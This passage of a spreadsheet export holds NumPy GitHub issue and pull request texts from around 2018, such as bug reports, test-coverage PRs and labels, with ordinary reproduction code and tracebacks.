--&gt; 110                     .format(public_api, list(map(type, overloaded_args))))_x000D_
    111_x000D_
    112_x000D_
_x000D_
TypeError: no implementation found for 'numpy.sum' on types that implement __array_function__: [&lt;class '__main__.MyArray'&gt;]_x000D_
```</t>
  </si>
  <si>
    <t>MAINT: improved error message when no `__array_function__` implementation found</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: __array_function__', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Some of the top-level `*.rst.txt` docs were not part of our on-line or PDF docs:_x000D_
_x000D_
- `DISTUTILS.rst.txt`_x000D_
- `C_STYLE_GUIDE.rst.txt`_x000D_
_x000D_
Additionally, the ~`conduct/report_handling_manual.rst` and~ `alignment.rst` documents were not linked into a TOC, thus unavailable via links._x000D_
_x000D_
The top level `CAPI.rst.txt` is not linked in, I think we can drop or move it to informational NEPS if it has historical relevance still._x000D_
_x000D_
Edit: "orphaned" dos that are not in a TOC</t>
  </si>
  <si>
    <t>DOC: add missing docs</t>
  </si>
  <si>
    <t>Fixes #12122._x000D_
_x000D_
577dbbd, added in 2009 for numpy 1.5 to fix TRAC issue 1312 worked around a deficiency in that "`PyArg_ParseTuple("s#", ...)` refuses to return a buffer if ``bf_releasebuffer`` is present". That changeset never released a buffer_info_cache entry for a scalar. This fixes that problem. Note also cpython [issue 24009](https://bugs.python.org/issue24009) where they discuss deprecating [`"s#"`](https://docs.python.org/2.0/ext/parseTuple.html) parsing._x000D_
_x000D_
It is difficult to test this fix since the cache keys are id(value) and the cache is `static` in `buffer.c`. We should revisit the need for the cache, it seems like there should be a better way._x000D_
_x000D_
Edit: note that the issue number predates github, formatting</t>
  </si>
  <si>
    <t>BUG: Dealloc cached buffer info</t>
  </si>
  <si>
    <t xml:space="preserve">An issue was introduced in Numpy 1.15.3 compared to Numpy 1.15.2 which results in comparisons of masked arrays crashing (this has broken some functionality over at astropy - e.g. https://github.com/astropy/astropy/issues/7943)_x000D_
_x000D_
This is likely due to https://github.com/numpy/numpy/pull/12237_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
**Expected (Numpy 1.15.2)**_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; (np.ma.array(['A', 'B', 'C'], fill_value='N') == 'A') | (np.ma.array(['A', 'B', 'C'], fill_value='N') == 'A')_x000D_
masked_array(data=[ True, False, False],_x000D_
             mask=False,_x000D_
       fill_value='N')_x000D_
```_x000D_
_x000D_
(arguably this was wrong too since fill_value should have been a bool, but at least it didn't crash)_x000D_
_x000D_
**Actual (Numpy 1.15.3)**:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; (np.ma.array(['A', 'B', 'C'], fill_value='N') == 'A') | (np.ma.array(['A', 'B', 'C'], fill_value='N') == 'A')_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "/Users/tom/miniconda3/envs/np1153/lib/python3.6/site-packages/numpy/ma/core.py", line 3016, in __array_finalize___x000D_
    self._fill_value = _check_fill_value(self._fill_value, self.dtype)_x000D_
  File "/Users/tom/miniconda3/envs/np1153/lib/python3.6/site-packages/numpy/ma/core.py", line 476, in _check_fill_value_x000D_
    fill_value = np.array(fill_value, copy=False, dtype=ndtype)_x000D_
ValueError: invalid literal for int() with base 10: 'N'_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Python 3.6, Numpy 1.15.3_x000D_
</t>
  </si>
  <si>
    <t>Bug in masked array boolean comparison in Numpy 1.15.3</t>
  </si>
  <si>
    <t xml:space="preserve">- Forward port 1.15.3-changelog.rst_x000D_
- Forward port 1.15.3-notes.rst_x000D_
- Minor fixes to RELEASE_WALKTHROUGH.rst.txt_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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Update docs after NumPy 1.15.3 release.</t>
  </si>
  <si>
    <t>`np.sort_complex()` is [completely uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/function_base.py#L1547) by unit tests</t>
  </si>
  <si>
    <t>TST: tests for sort_complex()</t>
  </si>
  <si>
    <t>Fixes #5300, both np.ascontiguousarray and np.asfortranarray are_x000D_
depreciated in favor of  np.asarray(..., order=...)_x000D_
because of their buggy behavior for scalars._x000D_
There is no timeline for dropping functions, but we need to _x000D_
discourage users from using these functions.</t>
  </si>
  <si>
    <t>DEP: deprecate ascontiguousarray and asfortranarray</t>
  </si>
  <si>
    <t>Fixes #12200 by making a copy of the matrix before NaN's are excluded_x000D_
_x000D_
EDIT: Code to test the new error message:_x000D_
```python_x000D_
a = np.array([np.inf, 0])_x000D_
b = np.array([np.inf, 1])_x000D_
np.testing.assert_almost_equal(a, b)_x000D_
```_x000D_
Output:_x000D_
```_x000D_
AssertionError: _x000D_
Arrays are not almost equal to 7 decimals_x000D_
_x000D_
(mismatch 50.0%)_x000D_
 x: array([inf,  0.])_x000D_
 y: array([inf,  1.])_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Fix misleading assert message in assert_almost_equal #12200</t>
  </si>
  <si>
    <t>[Uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/histograms.py#L1026) code paths for `density` and `normed` argument aliasing and degeneracy handling in `histogramdd`.</t>
  </si>
  <si>
    <t>TST: arg handling tests in histogramdd</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #12206, which was a regression introduced by #10602_x000D_
_x000D_
Frankly I'd consider the results expected by `test_void_subclass_unsized` and `test_void_subclass_sized` undesirable, but they match the behavior in 1.12.x_x000D_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</si>
  <si>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crash in repr of void subclasses</t>
  </si>
  <si>
    <t>This fix will preserve subtypes of ndarray when given as input (x)_x000D_
to the polyval function. In particular, the results for masked_x000D_
values of a masked array will be masked._x000D_
_x000D_
Fixes #2477.</t>
  </si>
  <si>
    <t xml:space="preserve">The azure-pipeline Mac testing fails unpredictably for some of the f2py_x000D_
tests. The following tests are checked out from master to get the fixes._x000D_
_x000D_
- test_return_real.py_x000D_
- test_semicolon_split.py_x000D_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</si>
  <si>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Backport azure-pipeline testing fixes for Mac</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: numpy.f2py']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes the regression introduced by #10211 where the masked array fill_x000D_
value type was not properly converted by astype._x000D_
_x000D_
Closes #12070._x000D_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</si>
  <si>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MaskedArray fill_value type conversion.</t>
  </si>
  <si>
    <t>Fixes #12038._x000D_
_x000D_
Starting with the sse code in simd.inc.src in PR #3419, then completed in PRs #9020, #11043, #11595, we adopted behaviour that warned when encountering a NAN on `np.maximum`, `np.minimum`, as well as ensuring we return a NAN value. This PR reverts emitting a warning, while preserving the tests to show we always propogate the NAN value to the output.</t>
  </si>
  <si>
    <t>BUG: maximum, minimum no longer emit warnings on NAN</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.ufunc']</t>
  </si>
  <si>
    <t>Our mapping from [cversions.txt](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/code_generators/cversions.txt) to [`numpyconfig.h`](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/include/numpy/numpyconfig.h#L24) is out of date. _x000D_
_x000D_
The only place it mattered was in deprecating [`PyArray_XDECREF_ERR`](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/include/numpy/ndarrayobject.h#L272) which was labelled `NPY_1_14_API_VERSION`.</t>
  </si>
  <si>
    <t>MAINT: update API_VERSION to numpy version mapping</t>
  </si>
  <si>
    <t>Fixes #11969 by changing the signature and adding checks._x000D_
_x000D_
I added a check for `PyArray_GetArrayParamsFromObject` returning an error, but could not build a test to check it. The function will hit the [`PySequenceCheck`](https://github.com/numpy/numpy/blob/v1.15.2/numpy/core/src/multiarray/ctors.c#L1658) branch, and then can only fail on memory error, or if `PyArray_DescrFromType()` fails, which it never does.</t>
  </si>
  <si>
    <t>MAINT: refactor PyArray_AdaptFlexibleDType to return a meaningful value</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Apparently `np.matrix` is getting deprecated, and my only used feature from it is the Matlab-style string initializer (e.g. `np.matrix('1 2; 3 4')`). This is a request to implement the equivalent functionality in `np.array`._x000D_
_x000D_
`np.array('1 2; 3 4')` apparently builds a character array, so a different syntax should be used._x000D_
_x000D_
Suggestion: `np.arr()` (analogous to `np.mat()`)._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
A = np.matrix('1 2; 3 4')_x000D_
B = np.array('1 2; 3 4') # Wrong expected value_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>convenience syntax for array construction</t>
  </si>
  <si>
    <t xml:space="preserve">I do not think the following sentence for the documentation in `randint` is true: "In particular, this other one is the one to use to generate uniformly distributed discrete non-integers", since `random_integers` generates integers. It seems like a good idea to delete that sentence entirely._x000D_
</t>
  </si>
  <si>
    <t>DOC: delete incorrect comment about random.random_integers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- --&gt;_x000D_
 I tried to use np.random.choice with the multiprocessing library applied to identical data but in parallel processes to speed up a simulation. Then I came across an unexpected side effect._x000D_
 _x000D_
The random samplings appear to be less random when doing multiprocessing than when doing single processing. The pattern of mean values for the random sample are often identical for the few first samples, then there is a more regular pattern where identical values appear every second time or similar. Below is an example code with text output._x000D_
_x000D_
Output from the below code:_x000D_
Running Linux-4.15.0-36-generic-x86_64-with-Ubuntu-18.04-bionic on x86_64 computer_x000D_
_x000D_
Single process_x000D_
[136.99470804318773, 138.65168938261866, 133.59633227541497, 135.33624623443436, 135.3288614009962, 135.53831706018755, 134.80941789725605, 136.91831793195524, 136.46465072531421, 136.42414087330076, 135.62503639442536, 135.69894704276624, 136.61812340005451, 134.07609304581661, 134.61896782553274, 136.2073836821736]_x000D_
_x000D_
4 cores 8 threads_x000D_
7 threads used_x000D_
[134.58343651532508, 134.58343651532508, 134.58343651532508, 134.58343651532508, 134.58343651532508, 134.58343651532508, 134.58343651532508, 137.78699779947749, 137.78699779947749, 137.78699779947749, 133.45879254382663, 137.78699779947749, 137.78699779947749, 133.45879254382663, 137.78699779947749, 137.39873418456261]_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
import multiprocessing, psutil, platform_x000D_
import matplotlib.pyplot as plt_x000D_
_x000D_
def get_sampling_mean(distr_portion):_x000D_
    smps = []_x000D_
    for i in range(20):       _x000D_
        smp = np.random.choice(distr_portion, size=10)_x000D_
        smps.append(smp)_x000D_
    return np.mean(smps) _x000D_
 _x000D_
if __name__ == '__main__':_x000D_
    running_system_id_str = 'Running '+ platform.platform()_x000D_
    hardware_id_str = 'on ' +platform.processor()+ ' computer' _x000D_
    print(running_system_id_str, hardware_id_str)_x000D_
    print()_x000D_
       _x000D_
    """Make 16 identical distribution entries in a list"""_x000D_
    distr_size = 5000_x000D_
    distr = np.random.normal(loc=135, scale=20, size=distr_size)    _x000D_
    tasks = []_x000D_
    for task in range(16):_x000D_
        tasks.append(distr)_x000D_
        _x000D_
    """Get the single processing results"""_x000D_
    smp_means = list(map(get_sampling_mean, tasks))   _x000D_
    print('Single process')_x000D_
    print(smp_means)_x000D_
            _x000D_
    """Get the multiprocessing results"""  _x000D_
    cores = psutil.cpu_count(logical=False)_x000D_
    threads = psutil.cpu_count(logical=True)_x000D_
    if cores == threads:_x000D_
        threads_used = threads_x000D_
    else:_x000D_
        threads_used = threads-1        _x000D_
    print()_x000D_
    print(cores, 'cores', threads, 'threads')_x000D_
    print(threads_used, 'threads used') _x000D_
    _x000D_
    pool = multiprocessing.Pool(processes=threads_used)_x000D_
    smp_means_MPC = list(pool.map(get_sampling_mean, tasks))_x000D_
    print(smp_means_MPC)_x000D_
    _x000D_
        _x000D_
    figure, ax = plt.subplots(1, 2)_x000D_
    ax[0].plot(smp_means)_x000D_
    ax[1].plot(smp_means_MPC)_x000D_
    ax[0].set_xlabel('mean_smp_magnitude')_x000D_
    ax[1].set_xlabel('mean_smp_magnitude from MPC')_x000D_
    plt.show()_x000D_
```_x000D_
_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
1.13.3 3.6.6 (default, Sep 12 2018, 18:26:19) _x000D_
[GCC 8.0.1 20180414 (experimental) [trunk revision 259383]]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">np.random.choice with multiprocessing returns identical values more often than single processing </t>
  </si>
  <si>
    <t>['53 - Invalid', '57 - Close?', 'component: numpy.random']</t>
  </si>
  <si>
    <t>I tried installing the latest developer version of numpy today and am running into an error related to memory allocation when running ``polyfit``._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.polyfit([1,2,3], [1.2, 3.3, 4.5],  deg=1)_x000D_
python(87909,0x7fffaed02380) malloc: *** mach_vm_map(size=18446744071717433344) failed (error code=3)_x000D_
*** error: can't allocate region_x000D_
*** set a breakpoint in malloc_error_break to debug_x000D_
init_dgelsd failed init_x000D_
__main__:1: RankWarning: Polyfit may be poorly conditioned_x000D_
array([5.50113414e-313, 1.34764833e-312])_x000D_
```_x000D_
### Numpy/Python version information:_x000D_
_x000D_
Platform: MacOS 10.13.6_x000D_
_x000D_
Python:_x000D_
_x000D_
```_x000D_
Python 3.7.0 (default, Jun 28 2018, 07:39:16) _x000D_
[Clang 4.0.1 (tags/RELEASE_401/final)] :: Anaconda, Inc. on darwin_x000D_
```_x000D_
_x000D_
Numpy:_x000D_
_x000D_
```_x000D_
&gt;&gt;&gt; np.__git_revision___x000D_
'2be154408c6a088a296da3cad274473ea7d03317'_x000D_
```_x000D_
_x000D_
2be154408c6a088a296da3cad274473ea7d03317</t>
  </si>
  <si>
    <t>malloc issue with polyfit</t>
  </si>
  <si>
    <t>MAINT: Fix typo in comment</t>
  </si>
  <si>
    <t>https://scipy.github.io/old-wiki/pages/EricsBroadcastingDoc explains broadcasting well (including useful diagrams) and is linked to from https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html. It is the only link to https://scipy.github.io/old-wiki left._x000D_
_x000D_
This content should be integrated in the user guide. There's also useful code to draw such diagrams at https://jakevdp.github.io/PythonDataScienceHandbook/02.05-computation-on-arrays-broadcasting.html</t>
  </si>
  <si>
    <t>integrate content/images on broadcasting in docs</t>
  </si>
  <si>
    <t>`column_stack()` [isn't covered](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/shape_base.py#L593) apart from a single error handling test. Compare, for example, the `TestColumnStack ` class with the more developed `TestDstack`  just below it.</t>
  </si>
  <si>
    <t>TST: unit tests for column_stack.</t>
  </si>
  <si>
    <t>Replaces #11133._x000D_
Uses the extended generalized ufunc signature `(n?,k),(k,m?)-&gt;(n?,m?)`, a custom `PyUFunc_MatmulTypeResolver` function, and new inner loop functions to implement `matmul` as a true ufunc._x000D_
_x000D_
Still known todo:_x000D_
- [x] PR #11580 is needed to pass the failing test. The TypeResolver checks overlap. If the output and input overlap (via an `out` kwarg), the `ufunc-&gt;op_flag` will be set to use writeback semantics. On master, this currently does not work since all the flags are overridden._x000D_
- [x] The docstring processing needs refactoring, but I wanted to change it in two commits: the first to modify it for the new behavior, then to move it from `core/_add_newdocs.py` to `ufunc_docstrings`_x000D_
- [x] ~The `TypeResolver` should already choose the proper vector-vector, vector-matrix, or matrix-matrix inner loop based on shape (maybe, needs benchmarking to see which is faster)~ Leave this for a future PR_x000D_
- [x] Make sure the code handles non-contiguous inputs and output_x000D_
- [x] Make sure the conversions from `npy_intp` to blas `int` do not overflow_x000D_
- [x] General performance improvements to make sure the new code is no slower than the old code, which went through `einsum`._x000D_
_x000D_
Edit: update after commit 207fd8b3</t>
  </si>
  <si>
    <t>ENH: make matmul into a ufunc</t>
  </si>
  <si>
    <t>&lt;!--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```_x000D_
#!/usr/bin/env python_x000D_
import numpy as np_x000D_
_x000D_
y1 = np.asarray([_x000D_
[2.91449144e-01, 4.59977736e+00, 2.83297743e+01, 9.53724273e+00,_x000D_
  5.25221643e+00, 1.02158386e+01, 0.00000000e+00, 2.24806400e+00,_x000D_
  4.01949243e-01, 0.00000000e+00, 1.32968418e+00],_x000D_
 [1.66920873e+00, 2.31749208e+00, 3.10276239e+00, 6.89104278e+00,_x000D_
  1.07913083e+00, 9.11750228e+00, 6.86470141e+00, 2.24806400e+00,_x000D_
  1.96508519e+00, 0.00000000e+00, 0.00000000e+00],_x000D_
 [1.85467637e-01, 5.49072090e+00, 6.86880498e+01, 7.88398527e+00,_x000D_
  4.41940736e+00, 1.02032004e+01, 0.00000000e+00, 2.24806400e+00,_x000D_
  2.14372930e+00, 0.00000000e+00, 1.32968418e+00],_x000D_
 [2.91050681e-01, 4.59902850e+00, 2.82231912e+01, 9.53109983e+00,_x000D_
  5.26196419e+00, 1.02111336e+01, 0.00000000e+00, 2.24806400e+00,_x000D_
  4.02729258e-01, 4.76069790e-05, 1.32968418e+00],_x000D_
 [1.86186825e-01, 5.48743082e+00, 6.86648941e+01, 7.86822089e+00,_x000D_
  4.40019891e+00, 1.01876005e+01, 1.29820826e-03, 2.24806400e+00,_x000D_
  2.14295826e+00, 1.98928485e-03, 1.32968418e+00]_x000D_
])_x000D_
_x000D_
ydot1 = 2 * np.dot(y1,  y1.T)_x000D_
ydot2 = np.dot(y1,  2 * y1.T)_x000D_
if (ydot1 == ydot1.T).all():_x000D_
    print("ydot1 is symmetric")_x000D_
else:_x000D_
    print ("ydot1 is not symmetric")_x000D_
_x000D_
if (ydot2 == ydot2.T).all():_x000D_
    print("ydot2 is symmetric")_x000D_
else:_x000D_
    print ("ydot2 is not symmetric")_x000D_
```_x000D_
_x000D_
Run the code listed above, get the following result:_x000D_
_x000D_
```_x000D_
[ligc@macbook: ~]$ python test.py_x000D_
ydot1 is symmetric_x000D_
ydot2 is not symmetric_x000D_
[ligc@macbook: ~]$_x000D_
```_x000D_
_x000D_
The problem is that the ```np.dot(y1,  2 * y1.T)``` returns a non-symmetric matrix, we have a lot of machines with the same numpy and scipy version to run this code, **the problem only occurs on a few nodes**. The non-symmetric matrix causes problems for our product, we COULD change the ydot1 = \&lt;n\&gt; * np.dot(y1,  y1.T) to ydot2 = np.dot(y1,  \&lt;n\&gt; * y1.T),  it will involve a lot of code changes and we would like to understand why it happens._x000D_
_x000D_
This might be related to https://github.com/numpy/numpy/issues/6794 and https://github.com/numpy/numpy/issues/6793_x000D_
_x000D_
### Numpy/Python version information:_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
```_x000D_
[ligc@macbook: ~]$ python_x000D_
Python 2.7.10 (default, Oct  6 2017, 22:29:07)_x000D_
[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.31)] on darwin_x000D_
Type "help", "copyright", "credits" or "license" for more information._x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
('1.15.2', '2.7.10 (default, Oct  6 2017, 22:29:07) \n[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.31)]')_x000D_
&gt;&gt;&gt;_x000D_
```</t>
  </si>
  <si>
    <t xml:space="preserve">np.dot(A, &lt;n&gt;*A.T) returns a non-symmetric matrix </t>
  </si>
  <si>
    <t>['53 - Invalid', '57 - Close?']</t>
  </si>
  <si>
    <t>For [uncovered path](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/histograms.py#L373) where `bins` is an array with more than one dimension.</t>
  </si>
  <si>
    <t>TST: test histogram bins dims</t>
  </si>
  <si>
    <t>Probe [uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/lib/histograms.py#L250) code path where `histogram` receives a range that starts with a higher value than it ends with.</t>
  </si>
  <si>
    <t>TST: test invalid histogram range</t>
  </si>
  <si>
    <t>For [uncovered path](https://codecov.io/gh/numpy/numpy/src/master/numpy/linalg/linalg.py#L2198)  where inputs have incompatible shapes.</t>
  </si>
  <si>
    <t>TST: test dims match on lstsq()</t>
  </si>
  <si>
    <t>`tensorinv()` was previously [completely uncovered](https://codecov.io/gh/numpy/numpy/src/master/numpy/linalg/linalg.py#L459) by unit tests</t>
  </si>
  <si>
    <t>TST: add test for tensorinv()</t>
  </si>
  <si>
    <t>xref #12028_x000D_
_x000D_
Here's what you currently see if `__array_function__` returns `NotImplemented`:_x000D_
```_x000D_
In [1]: import numpy as np_x000D_
_x000D_
In [2]: class MyArray:_x000D_
   ...:     def __array_function__(*args, **kwargs):_x000D_
   ...:         return NotImplemented_x000D_
   ...:_x000D_
_x000D_
In [3]: np.sum(MyArray())_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-3-c8a80bb1d37e&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.sum(MyArray())_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in public_api(*args, **kwargs)_x000D_
    149             relevant_args = dispatcher(*args, **kwargs)_x000D_
    150             return array_function_implementation_or_override(_x000D_
--&gt; 151                 implementation, public_api, relevant_args, args, kwargs)_x000D_
    152_x000D_
    153         # TODO: remove this when we drop Python 2 support (functools.wraps_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in array_function_implementation_or_override(implementation, public_api, relevant_args, args, kwargs)_x000D_
    108     raise TypeError('no implementation found for {} on types that implement '_x000D_
    109                     '__array_function__: {}'_x000D_
--&gt; 110                     .format(public_api, list(map(type, overloaded_args))))_x000D_
    111_x000D_
    112_x000D_
_x000D_
TypeError: no implementation found for &lt;function sum at 0x10e070bf8&gt; on types that implement __array_function__: [&lt;class '__main__.MyArray'&gt;]_x000D_
```_x000D_
_x000D_
This error message should look something like this instead: `TypeError: no implementation found for 'numpy.sum' on types that implement __array_function__: [&lt;class '__main__.MyArray'&gt;]`_x000D_
_x000D_
I think we will need to add a `name`  parameter to `array_function_override` to do this properly. The best we could hope for with introspection is to use `__module__` and `__name__` to come up with something like `numpy.core.fromnumeric.sum`. This would be better what we currently have and could be a reasonable default, but we really don't want people reaching directly into internal modules like `fromnumeric`.</t>
  </si>
  <si>
    <t>__array_function__ errors should more clearly identify the non-implemented function</t>
  </si>
  <si>
    <t xml:space="preserve">``ndarray.__repr__`` and ``ndarray.__str__`` should not rely upon ``__array_function__`` internally, so they are still well defined on subclasses even if ``array_repr`` and ``array_str`` are not implemented._x000D_
_x000D_
Fixes gh-12162_x000D_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</si>
  <si>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`ndarray.__repr__` should not rely on `__array_function__`</t>
  </si>
  <si>
    <t>The current documentation examples are somewhat misleading because they return the same output as np.max and np.min would return:_x000D_
```_x000D_
a = np.arange(6).reshape(2,3)_x000D_
if np.min(a) == np.argmin(a):_x000D_
    print("confusing!")_x000D_
```_x000D_
I think that this leads to unnecessary confusion. Therefore I adjusted the relevant examples slightly to remove this coincidence.</t>
  </si>
  <si>
    <t>DOC: Clarify the examples for argmax and argmin</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
np.timedelta64(np.int64(37), 'D')_x000D_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ValueError                                Traceback (most recent call last)_x000D_
    &lt;ipython-input-48-4b6fda1fa989&gt; in &lt;module&gt;_x000D_
    ----&gt; 1 np.timedelta64(np.int64(37), 'D')_x000D_
_x000D_
ValueError: Could not convert object to NumPy timedelta_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
1.15.2 3.7.0 (default, Jun 28 2018, 07:39:16) _x000D_
[Clang 4.0.1 (tags/RELEASE_401/final)]</t>
  </si>
  <si>
    <t>Can not convert np.int64 to timedelta64</t>
  </si>
  <si>
    <t xml:space="preserve">*Importing* distutils.msvccompiler works on non-Windows systems, but_x000D_
triggers a pointless "warning" (using distutils' own logging system;_x000D_
"Can't read registry etc.")  Delay the import so that other uses of_x000D_
distutils.misc_util are not affected._x000D_
_x000D_
When running distutils commands, the verbosity is set by default to 1_x000D_
(`self.verbose = 1` in distutils/dist.py) so the warning does get_x000D_
displayed._x000D_
_x000D_
To trigger the warning, subclass e.g. build_ext, override its_x000D_
finalize_options method, import numpy.distutils.misc_util from there,_x000D_
and then pass the new build_ext as cmdclass to setuptools.setup()._x000D_
_x000D_
Partially reverts 15f52f5._x000D_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</si>
  <si>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Delay import of distutils.msvccompiler to avoid warning on non-Windows.</t>
  </si>
  <si>
    <t xml:space="preserve">This one is on me, I think, in #10602. I wasn't aware this was legal:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.__version___x000D_
'1.13.3'_x000D_
&gt;&gt;&gt; class Custom(np.void): pass_x000D_
&gt;&gt;&gt; np.dtype(Custom)_x000D_
dtype('V')_x000D_
```_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.__version___x000D_
'1.16.0.dev0+7af8e10'_x000D_
&gt;&gt;&gt; class Custom(np.void): pass_x000D_
&gt;&gt;&gt; np.dtype(Custom)_x000D_
RuntimeError: Internal error: NumPy dtype unrecognized type number_x000D_
```_x000D_
_x000D_
Not sure if this affects 1.15.0_x000D_
</t>
  </si>
  <si>
    <t>BUG: dtype repr of subclasses of np.void throw an exception</t>
  </si>
  <si>
    <t>`dtype.name` is documented as returning a "bit name" - however, we don't want to force `__name__` to be a bit name, as this creates confusing collisions in the repr of the scalar types._x000D_
_x000D_
This should be the last refactor needed to get #10151 in.</t>
  </si>
  <si>
    <t>MAINT: avoid relying on `np.generic.__name__` in `np.dtype.name`</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
Why does numpy have inconsistent naming convention followed for infinity and negative infinity?_x000D_
For infinity, it is `np.inf` (all small `inf`)_x000D_
For negative infinity, it is `np.NINF` (all capital `NINF`)_x000D_
_x000D_
Why not a standard same convention of all small / all cap?_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
&gt;&gt;&gt; import numpy as np; a=mx.nd.array([np.inf,np.NINF,-1,np.INF,np.ninf])_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
AttributeError: module 'numpy' has no attribute 'INF'_x000D_
&gt;&gt;&gt; import numpy as np; a=mx.nd.array([np.inf,np.NINF,-1,np.ninf])_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
AttributeError: module 'numpy' has no attribute 'ninf'_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
_x000D_
### Error message:_x000D_
```_x000D_
AttributeError: module 'numpy' has no attribute 'INF'_x000D_
AttributeError: module 'numpy' has no attribute 'ninf'_x000D_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1.14.3 3.6.5 |Anaconda, Inc.| (default, Apr 26 2018, 08:42:37) _x000D_
[GCC 4.2.1 Compatible Clang 4.0.1 (tags/RELEASE_401/final)]</t>
  </si>
  <si>
    <t>Inconsistent attribute naming of infinity and negative infinity</t>
  </si>
  <si>
    <t>Test [uncovered path](https://codecov.io/gh/numpy/numpy/src/master/numpy/linalg/linalg.py#L148) in `np.linalg.linalg._commonType()`, where input array is of an unsupported type._x000D_
_x000D_
I couldn't think of more unsupported types offhand, but there may be other subclasses of `inexact` smaller than single precision that I've forgotten about.</t>
  </si>
  <si>
    <t>TST: coverage for _commonType()</t>
  </si>
  <si>
    <t>When using np.testing.assert_almost_equal (and related functions like assert_allclose) to compare arrays which include infs, the error message can be misleading. It describes a comparison between arrays with the infs stripped out, which makes debugging more difficult._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
np.testing.assert_almost_equal([np.inf, 0], [np.inf, 1])_x000D_
```_x000D_
_x000D_
In numpy version 1.12.1, this produces the error message _x000D_
```_x000D_
AssertionError: _x000D_
Arrays are not almost equal to 7 decimals_x000D_
_x000D_
(mismatch 100.0%)_x000D_
 x: array([ inf,   0.])_x000D_
 y: array([ inf,   1.])_x000D_
```_x000D_
_x000D_
In numpy version 1.13.3, we instead get the error message_x000D_
```_x000D_
AssertionError: _x000D_
Arrays are not almost equal to 7 decimals_x000D_
_x000D_
(mismatch 100.0%)_x000D_
 x: array([ 0.])_x000D_
 y: array([ 1.])_x000D_
```_x000D_
_x000D_
This second error message doesn't reflect what arrays are actually being compared. (The mismatch percentage is also wrong, in both versions.)</t>
  </si>
  <si>
    <t>Misleading assert_almost_equal error message in presence of infs.</t>
  </si>
  <si>
    <t xml:space="preserve">Add [Azure triggers](https://docs.microsoft.com/en-us/azure/devops/pipelines/yaml-schema?view=vsts&amp;tabs=example#trigger) as [requested](https://github.com/numpy/numpy/issues/12158#issuecomment-430448159) by @charris._x000D_
_x000D_
This may increase the likelihood that maintenance branch CI will "just work" so Chuck / others don't lose time fiddling with backport PRs and so on. _x000D_
_x000D_
